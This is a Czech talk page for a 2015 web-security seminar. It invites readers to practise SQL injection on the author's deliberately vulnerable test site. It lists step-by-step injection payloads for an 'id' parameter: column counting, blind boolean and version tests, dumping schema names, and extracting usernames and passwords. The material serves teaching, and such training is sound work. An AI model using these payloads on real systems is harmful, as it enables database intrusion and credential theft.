Za klidnější spánek (webových vývojářů a uživatelů)

Přednáška online

Detail přednášky

Několik nejčastějších bezpečnostních chyb a jak se proti nim bránit a co všechno udělat pro to, abychom měli všichni klidnější spaní.

SQL Injection si můžete zkusit na mém testovacím webu na adrese http://exploited.cz/…products.php. Měl by vás zajímat parametr id, který je sice ošetřen pomocí mysql_real_escape_string(), ale v tomto případě to není nic platné, protože aplikace očekává číslo a vstup není uzavřen do apostrofů. Jeho změnou můžete zkusit:

1. zjistit počet sloupců v dotazu SELECT ... FROM:
   • id=1 ORDER BY 1
   • id=1 ORDER BY 5
   • id=1 UNION SELECT 1,2,3,4
2. ověřit Blind SQL Injection:
   • id=1 AND 1=1
   • id=1 AND 1=2
   • id=1 AND SUBSTRING(VERSION(),1,6)=0x352e352e3238
3. zjistit, nějaké informace:
   • aktuální databázi a verzi serveru: id=1 UNION SELECT 1,DATABASE(),VERSION(),4
   • jména tabulek a sloupců, ke kterým má uživatel přístup id=1 UNION SELECT 1,table_name,column_name,4 FROM information_schema.columns
4. zjistit uživatelská jména a špatně uložená hesla:
   • id=1 UNION SELECT 1,username,password,4 FROM users

Přijďte si o webové bezpečnosti pro vývojáře popovídat na školení Bezpečnost PHP aplikací (13. 12. 2017 Praha). Vytváříte bezpečná hesla a máte zabezpečený prohlížeč? Že nevíte jak na to? Prozradím vám to na školení Bezpečnost pro uživatele (termín zatím nevypsán).

Datum a akce

6. 3. 2015, Seminář Web Inkognito na VŠE 2015